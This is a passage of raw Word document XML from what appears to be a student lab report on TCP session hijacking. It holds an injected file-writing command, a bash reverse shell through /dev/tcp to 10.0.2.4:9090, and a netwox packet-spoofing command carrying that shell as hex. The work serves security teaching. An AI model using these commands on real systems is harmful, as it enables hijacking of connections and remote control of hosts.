        <w:t>3195023860</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F4449E" w14:textId="75E8CFFD" w:rsidR="00E62A1E" w:rsidRDefault="00E62A1E" w:rsidP="00E62A1E">
      <w:r>
        <w:t xml:space="preserve">Acknowledgment number – </w:t>
      </w:r>
      <w:r w:rsidR="00B4566F" w:rsidRPr="00B4566F">
        <w:t>1373358937</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B26FDBE" w14:textId="054F37C2" w:rsidR="00F24055" w:rsidRDefault="00F24055" w:rsidP="00E62A1E">
      <w:r>
        <w:t>Window size value - 227</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643467E9" w14:textId="4E6F0B57" w:rsidR="007E1AFE" w:rsidRDefault="007E1AFE" w:rsidP="008C5E14"/>
    <w:p w14:paraId="1512DBC7" w14:textId="4387B9B6" w:rsidR="00121EA8" w:rsidRDefault="00121EA8" w:rsidP="008C5E14">
      <w:r>
        <w:t>We will use the hex value of “</w:t>
      </w:r>
      <w:r w:rsidR="00884E6A" w:rsidRPr="00884E6A">
        <w:t>echo \"virus\" &gt;&gt; /home/seed/server</w:t>
      </w:r>
      <w:r w:rsidR="00884E6A">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00884E6A" w:rsidRPr="00884E6A">
        <w:t xml:space="preserve"> confidential</w:t>
      </w:r>
      <w:r>
        <w:t>” as our “malicious” command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FC0195" w14:textId="0EEDAA28" w:rsidR="008F2A94" w:rsidRDefault="008F2A94" w:rsidP="008C5E14">
      <w:r w:rsidRPr="008F2A94">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6227E284" wp14:editId="05FE7C27">
            <wp:extent cx="5699125" cy="7131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9125" cy="713105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA566AB" w14:textId="3054FA9C" w:rsidR="008F2A94" w:rsidRDefault="008F2A94" w:rsidP="008C5E14"/>
    <w:p w14:paraId="471F0132" w14:textId="0B7DC2CB" w:rsidR="00B4566F" w:rsidRDefault="00B4566F" w:rsidP="008C5E14"/>
    <w:p w14:paraId="72A6A13D" w14:textId="7D84838A" w:rsidR="00B4566F" w:rsidRDefault="00B4566F" w:rsidP="008C5E14"/>
    <w:p w14:paraId="5FB73201" w14:textId="1206275C" w:rsidR="00B4566F" w:rsidRDefault="00B4566F" w:rsidP="008C5E14"/>
    <w:p w14:paraId="1120A37B" w14:textId="2C2C5BDC" w:rsidR="00B4566F" w:rsidRDefault="00B4566F" w:rsidP="008C5E14"/>
    <w:p w14:paraId="3CCCC6E9" w14:textId="16F7B722" w:rsidR="00B4566F" w:rsidRDefault="00B4566F" w:rsidP="008C5E14"/>
    <w:p w14:paraId="383948B4" w14:textId="77777777" w:rsidR="00B4566F" w:rsidRDefault="00B4566F" w:rsidP="008C5E14"/>
    <w:p w14:paraId="660035A4" w14:textId="387D964E" w:rsidR="00121EA8" w:rsidRDefault="00121EA8" w:rsidP="008C5E14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Conduct the attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797CD0FB" w14:textId="5FD8D61C" w:rsidR="00121EA8" w:rsidRDefault="00B4566F" w:rsidP="008C5E14">
      <w:r w:rsidRPr="00B4566F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C9AC944" wp14:editId="0994E655">
            <wp:extent cx="5699125" cy="26054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99125" cy="2605405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="723A67A5" w14:textId="77777777" w:rsidR="008C5E14" w:rsidRPr="008C5E14" w:rsidRDefault="008C5E14" w:rsidP="008C5E14"/>
    <w:p w14:paraId="612AE405" w14:textId="52FE4C37" w:rsidR="00376D00" w:rsidRDefault="00F24055" w:rsidP="00164485">
      <w:r>
        <w:t>We can see that our attack succeeds by looking in wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BEBEC3" w14:textId="63622EDC" w:rsidR="00F24055" w:rsidRDefault="00F24055" w:rsidP="00164485">
      <w:r>
        <w:t>Server’s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6B8AD3" w14:textId="02B9A1F4" w:rsidR="00F24055" w:rsidRDefault="00B4566F" w:rsidP="00164485">
      <w:r w:rsidRPr="00B4566F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2686AED6" wp14:editId="3BEEC097">
            <wp:extent cx="5699125" cy="6153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9125" cy="615315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22422314" w14:textId="6E1CC60B" w:rsidR="00F24055" w:rsidRDefault="00F24055" w:rsidP="00164485"/>
    <w:p w14:paraId="60E67686" w14:textId="60ECCBF2" w:rsidR="00F24055" w:rsidRDefault="00F24055" w:rsidP="00164485">
      <w:r>
        <w:t>Victim’s: (after I tried to refresh it)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A951B27" w14:textId="7F4EB214" w:rsidR="00F24055" w:rsidRDefault="00B4566F" w:rsidP="00164485">
      <w:r w:rsidRPr="00B4566F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F7206C0" wp14:editId="75FCD39A">
            <wp:extent cx="5699125" cy="6940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9125" cy="694055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00F24055" w:rsidRPr="00F24055">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D21EE13" wp14:editId="739BB4E0">
            <wp:extent cx="5699125" cy="7289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99125" cy="728980"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0912A247" w14:textId="1780A15F" w:rsidR="00B4566F" w:rsidRDefault="00B4566F" w:rsidP="00164485"/>
    <w:p w14:paraId="3CBB7E72" w14:textId="0100C4FB" w:rsidR="00B4566F" w:rsidRDefault="00B4566F" w:rsidP="00164485"/>
    <w:p w14:paraId="15918BA1" w14:textId="74FAE7D2" w:rsidR="00F77CBA" w:rsidRDefault="00F77CBA" w:rsidP="00F77CBA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Using Scapy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F44AF04" w14:textId="77777777" w:rsidR="00DA4A93" w:rsidRDefault="00DA4A93" w:rsidP="00164485"/>
    <w:p w14:paraId="28BA7709" w14:textId="1F62758F" w:rsidR="00F24055" w:rsidRDefault="00F77CBA" w:rsidP="00164485">
      <w:r>
        <w:t>New connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A58429" w14:textId="22359FEB" w:rsidR="00F77CBA" w:rsidRDefault="00F77CBA" w:rsidP="00164485">
      <w:r w:rsidRPr="00F77CBA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E44B26A" wp14:editId="5A924742">
            <wp:extent cx="5699125" cy="16408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99125" cy="1640840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0187F733" w14:textId="77777777" w:rsidR="00F77CBA" w:rsidRDefault="00F77CBA" w:rsidP="00164485"/>
    <w:p w14:paraId="6FC890D9" w14:textId="77777777" w:rsidR="00DA4A93" w:rsidRDefault="00DA4A93" w:rsidP="00DA4A93"/>
    <w:p w14:paraId="027D9343" w14:textId="77777777" w:rsidR="00DA4A93" w:rsidRDefault="00DA4A93" w:rsidP="00DA4A93"/>
    <w:p w14:paraId="4086F4BB" w14:textId="7C69D0D6" w:rsidR="00F24055" w:rsidRDefault="00DA4A93" w:rsidP="00DA4A93">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Scapy code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A88E08" w14:textId="26872C03" w:rsidR="00DA4A93" w:rsidRDefault="00DA4A93" w:rsidP="00164485">
      <w:r w:rsidRPr="00DA4A93">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41B5D12B" wp14:editId="79013BE9">
            <wp:extent cx="5699125" cy="21869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9125" cy="2186940"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB02B30" w14:textId="796DCBC2" w:rsidR="00DA4A93" w:rsidRDefault="00DA4A93" w:rsidP="00164485"/>
    <w:p w14:paraId="042EC5C5" w14:textId="77777777" w:rsidR="00DA4A93" w:rsidRPr="00376D00" w:rsidRDefault="00DA4A93" w:rsidP="00164485"/>
    <w:p w14:paraId="6B5FC2C4" w14:textId="457A893B" w:rsidR="00376D00" w:rsidRDefault="00376D00" w:rsidP="00164485">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Task 5: Creating Reverse Shell using TCP Session Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5667EA80" w14:textId="2E3DB0D8" w:rsidR="00376D00" w:rsidRDefault="00BF6631" w:rsidP="00164485">
      <w:r>
        <w:t xml:space="preserve">The idea is similar to task 4, only now we will use </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="34342EF9" w14:textId="6D2E17BD" w:rsidR="00BF6631" w:rsidRPr="00BF6631" w:rsidRDefault="00BF6631" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF6631">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/bin/bash -i &gt; /dev/tcp/10.0.2.4/9090 0&lt;&amp;1 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C51AFAA" w14:textId="0FB61A13" w:rsidR="00BF6631" w:rsidRDefault="00BF6631" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:t>As our malicious command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6477E144" w14:textId="77777777" w:rsidR="00B26C42" w:rsidRDefault="00B26C42" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FF5A159" w14:textId="3EC2B26B" w:rsidR="00B26C42" w:rsidRDefault="00B26C42" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
      <w:r>
        <w:t>Connecting to the server from the victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E438A76" w14:textId="465D9A30" w:rsidR="00B26C42" w:rsidRDefault="00B26C42" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
      <w:r w:rsidRPr="00B26C42">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22F4554E" wp14:editId="4AD218B7">
            <wp:extent cx="4844005" cy="244008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52608" cy="2444417"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF10F6A" w14:textId="372D5919" w:rsidR="00B26C42" w:rsidRDefault="00B26C42" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61BFE5C1" w14:textId="19DDF681" w:rsidR="00B26C42" w:rsidRDefault="00B26C42" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73468116" w14:textId="72D31B1B" w:rsidR="00B26C42" w:rsidRDefault="00B26C42" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27C3CD3A" w14:textId="1DA4EBA3" w:rsidR="00B26C42" w:rsidRDefault="00B26C42" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AF07D37" w14:textId="57009F3D" w:rsidR="00B26C42" w:rsidRDefault="00B26C42" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DE9D574" w14:textId="1EAEAB5E" w:rsidR="00B26C42" w:rsidRDefault="00B26C42" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DF10207" w14:textId="11E787F5" w:rsidR="00B26C42" w:rsidRDefault="00B26C42" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A578B6E" w14:textId="0B8CFB77" w:rsidR="00B26C42" w:rsidRDefault="00B26C42" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A97CB7D" w14:textId="6C664A48" w:rsidR="00B26C42" w:rsidRDefault="00B26C42" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B3C9E20" w14:textId="4F8AEFBD" w:rsidR="00B26C42" w:rsidRDefault="00B26C42" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="201C15C1" w14:textId="707B5CC2" w:rsidR="00B26C42" w:rsidRDefault="00B26C42" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47A281E7" w14:textId="77777777" w:rsidR="00B26C42" w:rsidRDefault="00B26C42" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3763D318" w14:textId="750AD519" w:rsidR="00B26C42" w:rsidRDefault="00B26C42" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>We will take our values from wireshark again</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9E0E61" w14:textId="31FB86D6" w:rsidR="00B26C42" w:rsidRDefault="00B26C42" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
      <w:r w:rsidRPr="00B26C42">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4537CB25" wp14:editId="0DB59257">
            <wp:extent cx="5699125" cy="17710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99125" cy="1771015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9C0287" w14:textId="5593FD95" w:rsidR="00B26C42" w:rsidRDefault="00B26C42" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29741FE3" w14:textId="68DE6ED4" w:rsidR="00B26C42" w:rsidRDefault="00B26C42" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
      <w:r>
        <w:t>Encode our command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E724ADA" w14:textId="09A5A057" w:rsidR="00B26C42" w:rsidRDefault="00B26C42" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
      <w:r w:rsidRPr="00B26C42">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39795390" wp14:editId="7F184681">
            <wp:extent cx="5699125" cy="8458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99125" cy="845820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ACFFF2" w14:textId="093EF817" w:rsidR="00B26C42" w:rsidRDefault="00B26C42" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51379E82" w14:textId="22C4F6BE" w:rsidR="007650C6" w:rsidRDefault="007650C6" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
      <w:r>
        <w:t>Our netwox command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D4C703" w14:textId="7E5FB9F3" w:rsidR="007650C6" w:rsidRDefault="007650C6" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
      <w:r w:rsidRPr="007650C6">
        <w:t>sudo netwox 40 -l 10.0.2.5 -j 64 -m 10.0.2.6 -o 51572 -p 23 -q 1531254387 -r 2459762528 -z -A -E 237 -H '0d0d2f62696e2f62617368202d69203e202f6465762f7463702f31302e302e322e342f3930393020303c263120323e26310d'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF913A6" w14:textId="0CE97D0E" w:rsidR="007650C6" w:rsidRDefault="007650C6" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DF570EA" w14:textId="520393AF" w:rsidR="00B26C42" w:rsidRDefault="007650C6" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
      <w:r>
        <w:t>Using the attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E457970" w14:textId="12BD5248" w:rsidR="007650C6" w:rsidRDefault="007650C6" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
      <w:r w:rsidRPr="007650C6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="001EAB24" wp14:editId="1C6D40DE">
            <wp:extent cx="5499063" cy="2442258"/>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00363" cy="2442835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="487A03CC" w14:textId="05A90D56" w:rsidR="007650C6" w:rsidRDefault="007650C6" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41715650" w14:textId="552D7C31" w:rsidR="007650C6" w:rsidRDefault="007650C6" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
      <w:r>
        <w:t>We can see in wireshark that our target (the server) get our command but for some reason, does not execute it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A9F91D" w14:textId="2B6441EA" w:rsidR="007650C6" w:rsidRDefault="00FF4855" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
      <w:r w:rsidRPr="007650C6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5677C3B9" wp14:editId="48A97E38">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-98074</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>35560</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5798019" cy="1672542"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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98019" cy="1672542"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CEA3F9" w14:textId="04AE3CEF" w:rsidR="00823951" w:rsidRPr="00376D00" w:rsidRDefault="00823951" w:rsidP="00BF6631">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00823951" w:rsidRPr="00376D00" w:rsidSect="006D047C">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1440" w:right="1134" w:bottom="1440" w:left="1797" w:header="709" w:footer="709"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NimbusRomNo9L-Medi">
    <w:altName w:val="Cambria"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="NimbusMonL-Bold">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7346512"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="35E4F5E2"/>
    <w:lvl w:ilvl="0" w:tplc="BBE261A4">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07D"/>
    <w:rsid w:val="000001D6"/>
    <w:rsid w:val="000B4851"/>
    <w:rsid w:val="00114B6D"/>
    <w:rsid w:val="00121EA8"/>
    <w:rsid w:val="001254DF"/>
    <w:rsid w:val="00164485"/>
    <w:rsid w:val="002434F9"/>
    <w:rsid w:val="003054D9"/>
    <w:rsid w:val="00340D13"/>
    <w:rsid w:val="00376D00"/>
    <w:rsid w:val="003D4439"/>
    <w:rsid w:val="003E1D98"/>
    <w:rsid w:val="0052785B"/>
    <w:rsid w:val="0053153D"/>
    <w:rsid w:val="00543873"/>
    <w:rsid w:val="00562AFC"/>
    <w:rsid w:val="00572796"/>
    <w:rsid w:val="005A602D"/>
    <w:rsid w:val="005C75C8"/>
    <w:rsid w:val="005F5E6B"/>
    <w:rsid w:val="00607579"/>
    <w:rsid w:val="00671EB3"/>
    <w:rsid w:val="00683CB5"/>
    <w:rsid w:val="006C1D52"/>
    <w:rsid w:val="006D047C"/>
    <w:rsid w:val="007404C0"/>
    <w:rsid w:val="0075194B"/>
    <w:rsid w:val="007650C6"/>
    <w:rsid w:val="007E1AFE"/>
    <w:rsid w:val="007E63CA"/>
    <w:rsid w:val="007E7FD1"/>
    <w:rsid w:val="00823951"/>
    <w:rsid w:val="00846C60"/>
    <w:rsid w:val="00850195"/>
    <w:rsid w:val="00884E6A"/>
    <w:rsid w:val="008C246F"/>
    <w:rsid w:val="008C52D0"/>
    <w:rsid w:val="008C5E14"/>
    <w:rsid w:val="008F2A94"/>
    <w:rsid w:val="0092408D"/>
    <w:rsid w:val="00950303"/>
    <w:rsid w:val="00987134"/>
    <w:rsid w:val="00A424DE"/>
    <w:rsid w:val="00A62E03"/>
    <w:rsid w:val="00A83755"/>
    <w:rsid w:val="00AF0AD2"/>
    <w:rsid w:val="00B12728"/>
    <w:rsid w:val="00B26C42"/>
    <w:rsid w:val="00B37CF9"/>
    <w:rsid w:val="00B41BF3"/>
    <w:rsid w:val="00B4566F"/>
    <w:rsid w:val="00B52B94"/>
    <w:rsid w:val="00B52DC9"/>
    <w:rsid w:val="00BA033E"/>
    <w:rsid w:val="00BF6631"/>
    <w:rsid w:val="00C23F23"/>
    <w:rsid w:val="00C72944"/>
    <w:rsid w:val="00C75EEE"/>
    <w:rsid w:val="00D02544"/>
    <w:rsid w:val="00D30D30"/>
    <w:rsid w:val="00D73B74"/>
    <w:rsid w:val="00D804F0"/>
    <w:rsid w:val="00D85099"/>
    <w:rsid w:val="00DA4A93"/>
    <w:rsid w:val="00DC4C5F"/>
    <w:rsid w:val="00E62A1E"/>
    <w:rsid w:val="00E6718F"/>
    <w:rsid w:val="00E74D80"/>
    <w:rsid w:val="00E9607D"/>
    <w:rsid w:val="00EA1FC4"/>
    <w:rsid w:val="00F006EF"/>
    <w:rsid w:val="00F24055"/>
    <w:rsid w:val="00F77CBA"/>
    <w:rsid w:val="00F90C08"/>
    <w:rsid w:val="00FD278B"/>
    <w:rsid w:val="00FE1923"/>
    <w:rsid w:val="00FF485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53488"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5B755995-A76C-4792-ACC5-1048992AD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heme="minorHAnsi" w:hAnsi="Calibri" w:cs="Arial"/>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4485"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00F90C08"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="24" w:space="0" w:color="5B9BD5"/>
        <w:left w:val="single" w:sz="24" w:space="0" w:color="5B9BD5"/>
        <w:bottom w:val="single" w:sz="24" w:space="0" w:color="5B9BD5"/>
        <w:right w:val="single" w:sz="24" w:space="0" w:color="5B9BD5"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="5B9BD5"/>
      <w:spacing w:after="240"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
